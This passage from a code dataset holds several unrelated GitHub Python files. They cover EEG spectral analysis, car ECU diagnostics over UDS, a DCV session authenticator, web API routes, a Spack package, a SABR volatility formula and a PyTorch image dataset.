weekday2):\n print(ja + ': ' + en)\n \n \nupperbases = [1, 2, 3, 4, 5]\nlowerbases = [2, 3, 4, 5, 6]\nheights = [3, 4, 5, 6, 7]\n\nfor u, l, h in zip(upperbases, lowerbases, heights):\n print('上底が{}cm、下底が{}cm、高さが{}cmの台形の面積は{}平方cmです'.format(\\\n u, l, h, (u + l) * h))","repo_name":"kawakubo2/my_python","sub_path":"kiso_python/imai/chapter03/zip1.py","file_name":"zip1.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"26103231681","text":"\"\"\"\nCompute the Power Spectral Density (PSD) for each channel.\n\nRunning:\nimport subprocess\nsubprocess.run('/net/tera2/home/aino/work/mtbi-eeg/python/processing/eeg/runall.sh', shell=True)\n\n\"\"\"\n\nimport argparse\n\nfrom mne.io import read_raw_fif\nfrom mne.time_frequency import psd_array_welch\nfrom h5io import write_hdf5\nfrom mne.viz import iter_topography\nfrom mne import open_report, find_layout, pick_info, pick_types, set_log_level\nimport matplotlib.pyplot as plt\nimport datetime\nimport time\nimport os\nimport sys\n\nparent_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))\nsys.path.append(parent_dir)\nfrom config_eeg import fname, n_fft, get_all_fnames, task_from_fname, freq_max\n\n# Save time of beginning of the execution to measure running time\nstart_time = time.time()\n\n# Deal with command line arguments\nparser = argparse.ArgumentParser(description=__doc__)\nparser.add_argument('subject', help='The subject to process')\nargs = parser.parse_args()\n\n# Compute the PSD for each task\npsds = dict()\n\n# Not all subjects have files for all conditions. These functions grab the\n# files that do exist for the subject.\nexclude = ['emptyroom'] \nbad_subjects = ['01P', '02P', '03P', '04P', '05P', '06P', '07P']#these ica need to be done manually\nall_fnames = zip(\n get_all_fnames(args.subject, kind='psds', exclude=exclude),\n get_all_fnames(args.subject, kind='clean', exclude=exclude),\n)\n\nfor psds_fname, clean_fname in all_fnames:\n task = task_from_fname(clean_fname)\n run = 1\n if '1' in task:\n task_wo_run = task.removesuffix('_run1')\n elif '2' in task:\n task_wo_run = task.removesuffix('_run2') \n run = 2\n else:\n task_wo_run = task\n \n raw = read_raw_fif(fname.clean(subject=args.subject, task=task_wo_run, run=run,ses='01'),\n preload=True)\n \n # Reduce logging level (technically, one could define it in the read_raw_fif function, but it seems to be buggy)\n # More info about the bug can be found here: https://github.com/mne-tools/mne-python/issues/8872\n set_log_level(verbose='Warning')\n \n raw.info['bads']=[]\n sfreq=raw.info['sfreq']\n \n if 'eo' in task or 'ec' in task:\n clean_1 = raw.copy().crop(tmin=30, tmax=90)\n clean_2 = raw.copy().crop(tmin=120, tmax=180)\n clean_3 = raw.copy().crop(tmin=210, tmax=260)\n psds[task+'_3'], freqs = psd_array_welch(clean_3.get_data(picks=['eeg']), sfreq=sfreq, \n fmax=freq_max, n_fft=n_fft)\n\n elif 'PASAT' in task:\n clean_1 = raw.copy().crop(tmin=2, tmax=62)\n clean_2 = raw.copy().crop(tmin=62, tmax=122)\n \n psds[task+'_1'], freqs = psd_array_welch(clean_1.get_data(picks=['eeg']), sfreq=sfreq,\n fmax=freq_max, n_fft=n_fft)\n psds[task+'_2'], freqs = psd_array_welch(clean_2.get_data(picks=['eeg']), sfreq=sfreq,\n fmax=freq_max, n_fft=n_fft)\n \n \n # Add some metadata to the file we are writing\n psds['info'] = raw.info\n psds['freqs'] = freqs\n write_hdf5(fname.psds(subject=args.subject, ses='01'), psds, overwrite=True)\n\n# Add a PSD plot to the report.\nraw.pick_types(meg=False, eeg=True, eog=False, stim=False, ecg=False, exclude=[])\ninfo = pick_info(raw.info, sel=None)\nlayout = find_layout(info, exclude=[])\n\n\ndef on_pick(ax, ch_idx):\n \"\"\"Create a larger PSD plot for when one of the tiny PSD plots is\n clicked.\"\"\"\n ax.plot(psds['freqs'], psds['ec_1'][ch_idx], color='C0',\n label='eyes closed')\n ax.plot(psds['freqs'], psds['eo_1'][ch_idx], color='C1',\n label='eyes open')\n ax.plot(psds['freqs'], psds['PASAT_run1_1'][ch_idx], color='C2',\n label='pasat run 1')\n ax.plot(psds['freqs'], psds['PASAT_run2_1'][ch_idx], color='C3',\n label='pasat run 2')\n ax.legend()\n ax.set_xlabel('Frequency')\n ax.set_ylabel('PSD')\n\n\n# Make the big topo figure\nfig = plt.figure(figsize=(14, 9))\naxes = iter_topography(info, layout, on_pick=on_pick, fig=fig,\n axis_facecolor='white', fig_facecolor='white',\n axis_spinecolor='white')\nfor ax, ch_idx in axes:\n handles = [\n ax.plot(psds['freqs'], psds['ec_1'][ch_idx], color='C0'),\n ax.plot(psds['freqs'], psds['eo_1'][ch_idx], color='C1'),\n ax.plot(psds['freqs'], psds['PASAT_run1_1'][ch_idx], color='C2'),\n ax.plot(psds['freqs'], psds['PASAT_run2_1'][ch_idx], color='C3'),\n ]\nfig.legend(handles)\n\n\nwith open_report(fname.report(subject=args.subject)) as report:\n report.add_figure(fig, 'PSDs', replace=True)\n report.save(fname.report_html(subject=args.subject),\n overwrite=True, open_browser=False)\n\n# Calculate time that the script takes to run\nexecution_time = (time.time() - start_time)\nprint('\\n###################################################\\n')\nprint(f'Execution time of 03_psds.py is: {round(execution_time,2)} seconds\\n')\nprint('###################################################\\n')\n","repo_name":"BioMag/mtbi_meeg","sub_path":"src/processing/03_psds.py","file_name":"03_psds.py","file_ext":"py","file_size_in_byte":5067,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"70647597972","text":"#this script can read Climate control module on Ford Fusion 2017. HS2. HS2+\n# it requires python-uds\n# user can select one of the options\n# CC reqId = 0x7A7, resId = 0x7AF\n\n#notes (open items):\n# - when clearing DTCs the response recorded only grabs the first answer but sometimes there is a delay on the response,\n# ecu DTC clear: ['0x7f', '0x14', '0x78'], this is telling us the response will be delayed.\n# the actual dtc clear confirmation came after that. 01 54 00 00 00 00 00 00 how to capture it?\n# how to capture the DTCs?? this is the actual response? what to do when there is \n# -------> Ecu Read DTC Cmd ['0x19', '0x2', '0xd']\n#-------> ecuResetResponse: ['0x59', '0x2', '0xca', '0x90', '0x5a', '0x14', '0xa', '0x9a', '0x61', '0x15', '0xa', '0x9a', '0x69', '0x15', '0xa']\n\n# Next steps:\n# convert request services and responses to a more readable code.\n\n# import the library\nfrom uds import Uds\nimport pdb\nimport time\n# this is the one being used on this example:\n# https://python-uds.readthedocs.io/en/latest/interface.html\n# https://github.com/richClubb/python-uds/blob/master/docs/interface.rst\n\n\n\n#https://github.com/pylessard/python-udsoncan\n#https://udsoncan.readthedocs.io/en/latest/\n\n\ncc = Uds(reqId=0x7A7, resId=0x7AF, transportProtocol=\"CAN\", interface=\"peak\", device=\"PCAN_USBBUS1\")\n#time.sleep(0.5)\n\n#pdb.set_trace()\nwhile True:\n userChoice = input(\"Please select the service: \\n\\\n sw = Read SW PN (0xF188) \\n\\\n sn = Read Seria number (0xF18C \\n\\\n d = DTC read \\n\\\n c = DTC clear \\n\\\n r = ecu reset\\n\\\n x = exit the program \\n\\\n your input: \")\n\n if userChoice == 'sn':\n #pdb.set_trace()\n ######################################################################\n # ecu Serial number\n ecuSerialNumberCmd = [0x22, 0xF1, 0x8C]\n try:\n ecuSerialNumberResponse = cc.send(ecuSerialNumberCmd) # gets the entire response from the ECU\n print(\"-------> Ecu Serial number Cmd\", [hex(x) for x in ecuSerialNumberCmd])\n ecuSerialNumberResponse = ecuSerialNumberResponse[3:] # cuts the response down to just the serial number\n ecuSerialNumberResponseString = \"\" # initialises the string\n for i in ecuSerialNumberResponse: ecuSerialNumberResponseString += chr(i) # Iterates over each element and converts the array element into an ASCII string\n print(\"-------> ecu Serial number: \", ecuSerialNumberResponseString)\n except:\n print(\"-------> ECU serial Number Send did not complete/Response not received it\")\n\n elif userChoice == 'sw':\n #pdb.set_trace()\n ######################################################################\n # ecu SW PN\n ecuSwPnCmd = [0x22, 0xF1, 0x88]\n try:\n ecuSwPnResponse = cc.send(ecuSwPnCmd) # gets the entire response from the ECU\n print(\"-------> Ecu Sw PN Cmd\", [hex(x) for x in ecuSwPnCmd])\n #ecuSwPnResponseHex = [hex(x) for x in ecuSwPnResponse]\n ecuSwPnResponse = ecuSwPnResponse[3:] # cuts the response down to just the serial number\n ecuSwPnResponseString = \"\" # initialises the string\n for i in ecuSwPnResponse: ecuSwPnResponseString += chr(i) # Iterates over each element and converts the array element into an ASCII string\n print(\"-------> ecu SW PN: \", ecuSwPnResponseString)\n \n except:\n print(\"-------> ECU SW PN Send did not complete/Response not received it\")\n\n elif userChoice == 'd':\n #pdb.set_trace()\n ######################################################################\n # ecu DTC Read\n ecuDtcReadCmd = [0x19, 0x02, 0x0D]\n try:\n ecuDtcReadResponse = cc.send(ecuDtcReadCmd) # gets the entire response from the ECU\n print(\"-------> Ecu Read DTC Cmd\", [hex(x) for x in ecuDtcReadCmd])\n ecuDtcReadHex= [hex(x) for x in ecuDtcReadResponse]\n print(\"-------> ECU DTC read response: \", ecuDtcReadHex)\n \n except:\n print(\"-------> ECU DTC Read did not complete/Response not received it\")\n\n elif userChoice == 'c':\n #pdb.set_trace()\n ######################################################################\n # ecu DTC Clear\n ecuDtcClearCmd = [0x14, 0xFF, 0xFF, 0xFF]\n try:\n ecuDtcClearResponse = cc.send(ecuDtcClearCmd) # gets the entire response from the ECU\n print(\"-------> Ecu Read DTC Cmd\", [hex(x) for x in ecuDtcClearCmd])\n ecuDtcClearHex = [hex(x) for x in ecuDtcClearResponse]\n print(\"-------> ECU DTC Clear: \", ecuDtcClearHex)\n \n except:\n print(\"-------> ECU DTC Clear did not complete/Response not received it\")\n\n elif userChoice == 'r':\n #pdb.set_trace()\n ######################################################################\n ## reset Cmd\n ecuResetCmd = [0x11, 0x01] #the number of bytes needs to be removed, it is calculated by the lib\n try:\n ecuResetResponse = cc.send(ecuResetCmd) # gets the entire response from the ECU\n print(\"-------> Ecu Reset Cmd\", [hex(x) for x in ecuResetCmd])\n ecuResetResponseHex = [hex(x) for x in ecuResetResponse]\n print(\"-------> ecu Reset Response: \", ecuResetResponseHex)\n \n except:\n print(\"-------> ECU reset Send did not complete/Response not received it\")\n\n\n elif userChoice == 'x':\n print(\"program terminated by the user\", userChoice)\n break\n\n else:\n print(\"wrong selection, select a valid quetion or x for exit\")\n\n","repo_name":"carlosordal/mymodels","sub_path":"python/uds/uds_peak_Fusion_CC_7A7.py","file_name":"uds_peak_Fusion_CC_7A7.py","file_ext":"py","file_size_in_byte":5791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"30112598814","text":"import config\nfrom cryptography.fernet import Fernet\nfrom flask_restful import Resource, reqparse\nfrom flask import request\nimport logging\nfrom flask import Response\nimport read_secretmanager\nimport base64\nimport ast\nimport errors\nfrom models import db, LinuxDCVSessions, WindowsDCVSessions\n\nlogger = logging.getLogger(\"api\")\n\n\ndef decrypt(encrypted_text):\n try:\n key = config.Config.DCV_TOKEN_SYMMETRIC_KEY\n cipher_suite = Fernet(key)\n decrypted_text = cipher_suite.decrypt(encrypted_text)\n return decrypted_text.decode()\n except Exception as err:\n logger.error(f\"Unable to decrypt {encrypted_text} due to {err}\")\n return False\n\n\nclass DcvAuthenticator(Resource):\n def post(self):\n \"\"\"\n Authenticate a DCV desktop via authToken\n ---\n tags:\n - DCV\n parameters:\n - in: body\n name: body\n schema:\n required:\n - authenticationToken\n properties:\n authenticationToken:\n type: string\n description: DCV auth token\n responses:\n 200:\n description: The Pair of user/token is valid\n 401:\n description: Invalid user/token pair\n \"\"\"\n logger.info(\"DCV Authentication\")\n parser = reqparse.RequestParser()\n parser.add_argument(\"sessionId\", type=str, location=\"form\")\n parser.add_argument(\"authenticationToken\", type=str, location=\"form\")\n parser.add_argument(\"clientAddress\", type=str, location=\"form\")\n args = parser.parse_args()\n remote_addr = request.remote_addr\n if (\n args[\"sessionId\"] is None\n or args[\"authenticationToken\"] is None\n or args[\"clientAddress\"] is None\n ):\n return errors.all_errors(\n \"CLIENT_MISSING_PARAMETER\",\n \"sessionId (str), clientAddress (str) and authenticationToken (str) are required.\",\n )\n session_id = args[\"sessionId\"]\n authentication_token = args[\"authenticationToken\"]\n client_address = args[\"clientAddress\"].split(\":\")[\n 0\n ] # keep only ip, remove port\n error = False\n user = False\n required_params = [\n \"system\",\n \"session_user\",\n \"session_token\",\n \"session_instance_id\",\n ]\n session_info = {}\n logger.info(\"Detected {} and remote_addr {}\".format(args, remote_addr))\n\n try:\n decoded_token = decrypt(base64.b64decode(authentication_token))\n if decoded_token is False:\n logger.error(\n \"Unable to decrypt the authentication token. It was probably generated by a different Fernet key\"\n )\n error = True\n else:\n decoded_token = ast.literal_eval(decoded_token)\n except Exception as err:\n logger.error(\"Unable to base64 decode the authentication token\")\n error = True\n\n if error is False:\n for param in required_params:\n if param not in decoded_token.keys():\n logger.error(\n \"Unable to find {} in {}\".format(decoded_token, decoded_token)\n )\n error = True\n else:\n session_info[param] = decoded_token[param]\n if error is False:\n if session_info[\"system\"].lower() == \"windows\":\n validate_session = WindowsDCVSessions.query.filter_by(\n user=session_info[\"session_user\"],\n session_host_private_ip=remote_addr,\n session_token=session_info[\"session_token\"],\n session_instance_id=session_info[\"session_instance_id\"],\n is_active=True,\n ).first()\n\n else:\n validate_session = LinuxDCVSessions.query.filter_by(\n user=session_info[\"session_user\"],\n session_host_private_ip=remote_addr,\n session_token=session_info[\"session_token\"],\n session_instance_id=session_info[\"session_instance_id\"],\n is_active=True,\n ).first()\n if validate_session:\n user = session_info[\"session_user\"]\n else:\n error = True\n\n if error is False and user is not False:\n if session_info[\"system\"].lower() == \"windows\":\n soca_config = read_secretmanager.get_soca_configuration()\n if soca_config[\"AuthProvider\"] == \"activedirectory\":\n xml_response = f'{soca_config[\"DSDomainNetbios\"]}\\\\{user}'\n else:\n xml_response = (\n '' + user + \"\"\n )\n\n else:\n xml_response = (\n '' + user + \"\"\n )\n\n status = 200\n logger.info(\"Successfully authenticated session\")\n else:\n xml_response = ''\n status = 401\n logger.error(\n \"Unable to authenticate this DCV session. Make sure remote_addr point to the private IP address of your DCV manager (verify your proxy settings).\"\n )\n\n return Response(xml_response, status=status, mimetype=\"text/xml\")\n","repo_name":"awslabs/scale-out-computing-on-aws","sub_path":"source/soca/cluster_web_ui/api/v1/dcv/authenticator.py","file_name":"authenticator.py","file_ext":"py","file_size_in_byte":5621,"program_lang":"python","lang":"en","doc_type":"code","stars":108,"dataset":"github-code","pt":"66"} +{"seq_id":"27307227255","text":"import pandas as pd\nfrom credentials import TARGET_SENDER, OTHER_SENDER\n\ndef extractMsgs():\n # Define the sender's name you want to extract messages from\n target_sender = TARGET_SENDER\n other_sender = OTHER_SENDER\n MSG_FILE = \"../punyRec.txt\"\n\n # Initialize a list to store the messages sent by the target sender\n target_sender_messages = []\n other_sender_messages = []\n\n with open(MSG_FILE, \"r\", encoding=\"utf8\") as file:\n lines = file.readlines()\n\n current_message = \"\"\n other_message = \"\"\n\n # Ensure first message processed is from target sender -> this is to get desired form\n for i in range(0, len(lines)):\n if lines[i].strip().endswith(target_sender):\n start = i\n break\n\n\n # For loop extracts messages from both users in the format:\n # Other sender Message | Target user's response to the message\n # saves results into CSV\n\n # Format is always -> user followed by message on next line\n for i in range(start, len(lines), 2):\n line = lines[i].strip()\n\n if line == \"\":\n continue\n\n # We want to continuously add to the current message -> this is to take care of the cases where\n # Users type semantic sentences in more than one message -> so we merge the lines as such\n if line.endswith(target_sender):\n\n # Process target user message\n current_message += lines[i + 1].strip() + \" \"\n # As soon as we see a line not from target user\n elif line.endswith(other_sender):\n\n ''' We will make the assumption that messages < 3 words long are semantically irrelevant -> just added noise'''\n number_words = current_message.split()\n if len(number_words) >= 3:\n # We only SAVE the other user message when we save target user (so that they come 1:1)\n \n other_sender_messages.append(other_message)\n other_message = \"\"\n # Save target user\n target_sender_messages.append(current_message)\n current_message = \"\"\n\n # Processesing other user messaages => we'll process it every time we come across it\n other_message += lines[i + 1].strip() + \" \"\n\n # For last message\n if current_message and other_message:\n number_words = current_message.split()\n if len(number_words) >= 3:\n other_sender_messages.append(other_message)\n #other_message = \"\"\n # Save target user\n target_sender_messages.append(current_message)\n\n\n for message in target_sender_messages:\n print(message)\n print(\"=================\")\n for message in other_sender_messages:\n print(message)\n\n \n try:\n df = pd.DataFrame({'Prompt':target_sender_messages[:-1], 'Message': other_sender_messages[1:], 'Response': target_sender_messages[1:]})\n except:\n print(len(target_sender_messages))\n print(len(other_sender_messages))\n # Write the DataFrame to a CSV file\n output_file = \"conversation.csv\"\n df.to_csv(output_file, index=False)\n \n return df\n\n\n''' ==========================FUNCTION CALLS (for testing)=========================== '''\n\n","repo_name":"derronli/cupid-bot","sub_path":"MsgExtract.py","file_name":"MsgExtract.py","file_ext":"py","file_size_in_byte":3229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"73071150931","text":"from flask import Flask\n\nfrom app.configs import database, env_configs, migration\n\nfrom app.routes import leads_blueprint\n\n\ndef create_app():\n\n app = Flask(__name__)\n env_configs.init_app(app)\n database.init_app(app)\n migration.init_app(app)\n\n app.register_blueprint(leads_blueprint.bp)\n\n return app\n","repo_name":"Charles-Pinheiro/CRUD-SQL-ORM","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"41339945961","text":"# FastAPI, MongoDB\r\nfrom fastapi import APIRouter, HTTPException, status, Depends\r\nfrom beanie import PydanticObjectId\r\n\r\n# DB, Models\r\nfrom database.connection import Database\r\nfrom models.events import Event, EventUpdate\r\n\r\n# AUTH\r\nfrom auth.authenticate import authenticate\r\n\r\n# Other\r\nfrom typing import List\r\n\r\nevent_router = APIRouter(tags=[\"Events\"])\r\nevent_database = Database(Event)\r\n\r\n\r\n@event_router.get(\"/\", response_model=List[Event])\r\nasync def retrieve_all_events() -> List[Event]:\r\n events = await event_database.get_all()\r\n return events\r\n\r\n\r\n@event_router.get(\"/{id}\", response_model=Event)\r\nasync def retrieve_single_event(id: PydanticObjectId,\r\n user: str = Depends(authenticate)) -> Event:\r\n event = await event_database.get(id)\r\n if not event:\r\n raise HTTPException(\r\n status_code=status.HTTP_404_NOT_FOUND,\r\n detail=f\"Event with id {id} not found.\"\r\n )\r\n if event.creator != user:\r\n raise HTTPException(\r\n status_code=status.HTTP_401_UNAUTHORIZED,\r\n detail=\"You dont have permission to get this event.\"\r\n )\r\n else:\r\n return event\r\n\r\n\r\n@event_router.post(\"/new\")\r\nasync def create_event(new_event: Event, user: str = Depends(authenticate)) -> dict:\r\n new_event.creator = user\r\n await event_database.save(new_event)\r\n return {\"message\": \"Event created successfully.\"}\r\n\r\n\r\n@event_router.delete(\"/{id}\")\r\nasync def delete_event(id: PydanticObjectId, user: str = Depends(authenticate)) -> dict:\r\n event = await event_database.get(id)\r\n if not event:\r\n raise HTTPException(\r\n status_code=status.HTTP_404_NOT_FOUND,\r\n detail=f\"Event with id {id} not found.\"\r\n )\r\n if event.creator != user:\r\n raise HTTPException(\r\n status_code=status.HTTP_401_UNAUTHORIZED,\r\n detail=\"You dont have permission to delete this event.\"\r\n )\r\n else:\r\n await event_database.delete(id)\r\n return {\"message\": \"Event deleted successfully.\"}\r\n\r\n\r\n@event_router.delete(\"/\")\r\nasync def delete_all_events(user: str = Depends(authenticate)) -> dict:\r\n events = await event_database.get_all()\r\n for event in events:\r\n if event.creator != user:\r\n continue\r\n await event_database.delete(event.id)\r\n\r\n return {\"message\": \"Events delete successfully.\"}\r\n\r\n\r\n@event_router.put(\"/edit/{id}\", response_model=Event)\r\nasync def update_event(id: PydanticObjectId, new_event: EventUpdate,\r\n user: str = Depends(authenticate)) -> Event:\r\n event = await event_database.get(id)\r\n if not event:\r\n raise HTTPException(\r\n status_code=status.HTTP_404_NOT_FOUND,\r\n detail=f\"Event with id {id} not found.\"\r\n )\r\n if event.creator != user:\r\n raise HTTPException(\r\n status_code=status.HTTP_401_UNAUTHORIZED,\r\n detail=\"You dont have permission to change this event.\"\r\n )\r\n else:\r\n updated_event = await event_database.update(id, new_event)\r\n return updated_event\r\n","repo_name":"Kematin/FastAPI-book","sub_path":"ch8/planner/routes/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":3112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"39951397406","text":"from django.urls import path\r\nfrom . import views\r\n\r\nurlpatterns = [\r\n path('', views.index, name='home'),\r\n path('diseasetype/', views.type, name='type'),\r\n path('disease/', views.disease, name='disease'),\r\n path('country/', views.country, name='country'),\r\n path('users/', views.users, name='users'),\r\n path('doctors/', views.doctors, name='doctors'),\r\n path('specialize/', views.specialize, name='specialize'),\r\n path('publicservant/', views.publicservant, name='publicservant'),\r\n path('discover/', views.discover, name='discover'),\r\n path('record/', views.record, name='record'),\r\n path('add_type/', views.add_type, name='add_type'),\r\n path('delete_type/', views.delete_type, name='delete_type'),\r\n path('update_type/', views.update_type, name='update_type'),\r\n path('add_disease/', views.add_disease, name='add_disease'),\r\n path('update_disease/', views.update_disease, name='update_disease'),\r\n path('delete_disease/', views.delete_disease, name='delete_disease'),\r\n path('add_country/', views.add_country, name='add_country'),\r\n path('delete_country/', views.delete_country, name='delete_country'),\r\n path('update_country/', views.update_country, name='update_country'),\r\n path('add_user/', views.add_user, name='add_user'),\r\n path('update_user/', views.update_user, name='update_user'),\r\n path('delete_user/', views.delete_user, name='delete_user'),\r\n]","repo_name":"ayazhm/asssignment","sub_path":"test/main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"34811030823","text":"#encoding utf-8\n\n#__author__ = Jonas Duarte, duarte.jsystem@gmail.com\n#Python3\n__author__ = 'Jonas Duarte'\n\nimport configparser\n\ndef sesp_server():\n config = configparser.ConfigParser()\n config.read('resources/models/commons/conf.cfg')\n\n debug = config.get('sesp_server', 'debug')\n bind_address = config.get('sesp_server', 'bind_address')\n bind_port = config.get('sesp_server', 'bind_port')\n\n return {\n 'address' : bind_address,\n 'port' : bind_port,\n 'debug' : debug\n }\n\n\ndef fusion_inventory():\n config = configparser.ConfigParser()\n config.read('resources/models/commons/conf.cfg')\n\n server = config.get('fusion_inventory', 'server')\n inventory_frequency = config.get('fusion_inventory', 'inventory_frequency')\n\n return {\n 'server' : server,\n 'inventory_frequency' : int(inventory_frequency),\n }\n\ndef current_version():\n config = configparser.ConfigParser()\n config.read('resources/models/commons/conf.cfg')\n\n current_version = config.get('current_version', 'version')\n\n return current_version","repo_name":"Jonasdart/SESP-API","sub_path":"commons/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"40567759795","text":"from spack import *\n\n\nclass Bayeux(CMakePackage):\n \"\"\"SuperNEMO Core Data/Geometry/EventGen library\n \"\"\"\n\n homepage = \"https://github.com/SuperNEMO-DBD/Bayeux\"\n url = \"https://github.com/SuperNEMO-DBD/Bayeux/archive/3.3.0.tar.gz\"\n\n version('3.3.0', sha256='6468251da50214e744651260770bf252f677a8f9b9f822085c38dc69d71b52a9')\n version('3.1.2', sha256='2bf6b887e654fadbb7373fbea550ec14adc8836758fb029bf56c76bb5177827d')\n\n variant('cxxstd',\n default='11',\n values=('11', '14', '17'),\n multi=False,\n description='Use the specified C++ standard when building.')\n\n variant('geant4', default=False, description='Build mctools Geant4 module')\n variant('qt', default=False, description='Build datatools/variant browser')\n\n depends_on('cmake@3.3:', type='build')\n depends_on('boost@1.63:+icu')\n depends_on('camp@0.8.0')\n depends_on('clhep@2.1.3.1')\n depends_on('gsl@2.4:')\n depends_on('readline')\n depends_on('root@6.12:')\n\n # optional geant4/qt\n depends_on('geant4@:9.6 cxxstd=11', when='+geant4 cxxstd=11')\n depends_on('qt5base', when='+qt')\n\n\n\n def cmake_args(self):\n spec = self.spec\n args = [\n '-DBAYEUX_COMPILER_ERROR_ON_WARNING=OFF',\n '-DBAYEUX_ENABLE_TESTING=OFF',\n '-DBAYEUX_WITH_DOCS=OFF',\n '-DBAYEUX_CXX_STANDARD={0}'.format(spec.variants['cxxstd'].value)\n ]\n\n if spec.satisfies('+geant4'):\n args.append('-DBAYEUX_WITH_GEANT4_MODULE=ON')\n else:\n args.append('-DBAYEUX_WITH_GEANT4_MODULE=OFF')\n\n if spec.satisfies('+qt'):\n args.append('-DBAYEUX_WITH_QT_GUI=ON')\n else:\n args.append('-DBAYEUX_WITH_QT_GUI=OFF')\n\n return args\n","repo_name":"SuperNEMO-DBD/spack-supernemo","sub_path":"packages/bayeux/package.py","file_name":"package.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"37836188609","text":"def sabr_normal_vol(S_0,K,T,sigma_0,alpha,beta,rho):\n c = lambda x: x**beta\n c_prime = lambda x: beta*(x**(beta-1))\n c_prime_prime = lambda x: beta*(beta-1)*(x**(beta-2))\n S_mid = (S_0 + K)/2\n gamma_1 = c_prime(S_mid)/c(S_mid)\n gamma_2 = c_prime_prime(S_mid)/c(S_mid)\n zeta = alpha*(S_0**(1-beta) - K**(1-beta))/(sigma_0 * (1-beta))\n epsilon = T*(alpha**2)\n delta = np.log( (np.sqrt(1 - 2*rho*zeta + zeta**2) + zeta - rho)/(1-rho) )\n\n factor = alpha*(S_0 - K)/(delta)\n term_1 = ((2*gamma_2 - gamma_1**2)/24)* (sigma_0*c(S_mid) / alpha)**2\n term_2 = rho*gamma_1*sigma_0*c(S_mid)/(4*alpha)\n term_3 = (2-3*(rho**2))/24\n return factor*(1 + epsilon*(term_1 + term_2 + term_3))\n\ndef sabr_call(S_0,K,T,sigma_0,r,alpha,beta,rho):\n assert(S_0 != K)\n vol = sabr_normal_vol(S_0,K,T,sigma_0,alpha,beta,rho)\n return bachelier_call(S_0,K,T,vol,r)","repo_name":"lingyixu/Quant-Finance-With-Python-Code","sub_path":"chapter8/8_2_4.py","file_name":"8_2_4.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"66"} +{"seq_id":"33320146601","text":"from IPython.display import Image \r\nfrom PIL import Image\r\nimport albumentations as A \r\nfrom albumentations.pytorch import ToTensorV2\r\nfrom torch.utils.data import DataLoader, Dataset, WeightedRandomSampler\r\nimport torch\r\nimport numpy as np\r\nimport os\r\n\r\nclass DataFolder(Dataset):\r\n def __init__(self, root_directory, transform=None):\r\n super(DataFolder,self).__init__() \r\n self.data = []\r\n self.root_directory = root_directory\r\n self.transform = transform\r\n self.class_names= os.listdir(root_directory)\r\n # Loop through the folders and add labels to it signs: 0, notsigns: 1\r\n for index_labels, name in enumerate(self.class_names):\r\n if name == 'cctvsign':\r\n files_data = os.listdir(os.path.join(root_directory,name))\r\n self.data += list(zip(files_data, [index_labels]*len(files_data)))\r\n else:\r\n files_data = os.listdir(os.path.join(root_directory,name))\r\n self.data += list(zip(files_data, [index_labels]*len(files_data)))\r\n \r\n def __len__(self):\r\n return len(self.data)\r\n \r\n def __getitem__(self, index):\r\n img_name , label = self.data[index]\r\n root_and_dir = os.path.join(self.root_directory,self.class_names[label])\r\n #Traffic sign images have 4 channels need to be converted to 3 with conver RGB\r\n image = np.array(Image.open(os.path.join(root_and_dir,img_name)).convert(\"RGB\"))\r\n\r\n if self.transform is not None:\r\n augmentations_images= self.transform(image=image)\r\n image = augmentations_images['image']\r\n\r\n return image, label\r\n\r\ntrain_transform = A.Compose(\r\n [\r\n A.Resize(35,35),\r\n A.HorizontalFlip(p=0.65),\r\n A.VerticalFlip(p=0.65),\r\n A.Rotate(limit=40,p=0.65),\r\n A.RGBShift(r_shift_limit=25, g_shift_limit=25,b_shift_limit=25,p=0.65),\r\n A.Normalize(\r\n mean=(0,0,0),\r\n std =(1,1,1),\r\n max_pixel_value=225,\r\n p=1),\r\n A.OneOf([\r\n A.Blur(blur_limit=3, p=0.65),\r\n A.ColorJitter(p=0.5)\r\n ],p=1.0),\r\n \r\n ToTensorV2(),\r\n ]\r\n)\r\ntest_transform = A.Compose(\r\n [\r\n A.Resize(35,35),\r\n A.Normalize(\r\n mean=(0,0,0),\r\n std =(1,1,1),\r\n max_pixel_value=225,\r\n p=1),\r\n \r\n ToTensorV2(),\r\n ]\r\n)\r\n\r\n\r\n#Load the datasets \r\ntrain_dataset = DataFolder(root_directory=r'C:\\Users\\alexa\\University\\Master\\DSP-A2\\DSPA2\\dataset\\train_data',transform=train_transform)\r\ntest_dataset = DataFolder(root_directory=r'C:\\Users\\alexa\\University\\Master\\DSP-A2\\DSPA2\\dataset\\test_data',transform=test_transform)\r\n#Sampler to correct randomized batch in dataloader\r\n#list of labels, and class number function \r\n\r\ndef classes(dataset):\r\n class_cctv =0 \r\n class_not_cctv= 0\r\n labels_list = []\r\n for x, y in dataset:\r\n if y ==0:\r\n class_cctv += 1\r\n labels_list.append(y)\r\n if y==1:\r\n class_not_cctv += 1\r\n labels_list.append(y)\r\n return class_cctv,class_not_cctv,labels_list\r\n\r\n#sampler function\r\ndef sampler(class_1,class_2,labels_list):\r\n class_total_count = [class_1,class_2]\r\n weights_class = 1./torch.tensor(class_total_count, dtype=torch.float) \r\n class_weights_all = weights_class [labels_list]\r\n balanced_sampler = WeightedRandomSampler(\r\n weights=class_weights_all,\r\n num_samples=len(class_weights_all),\r\n 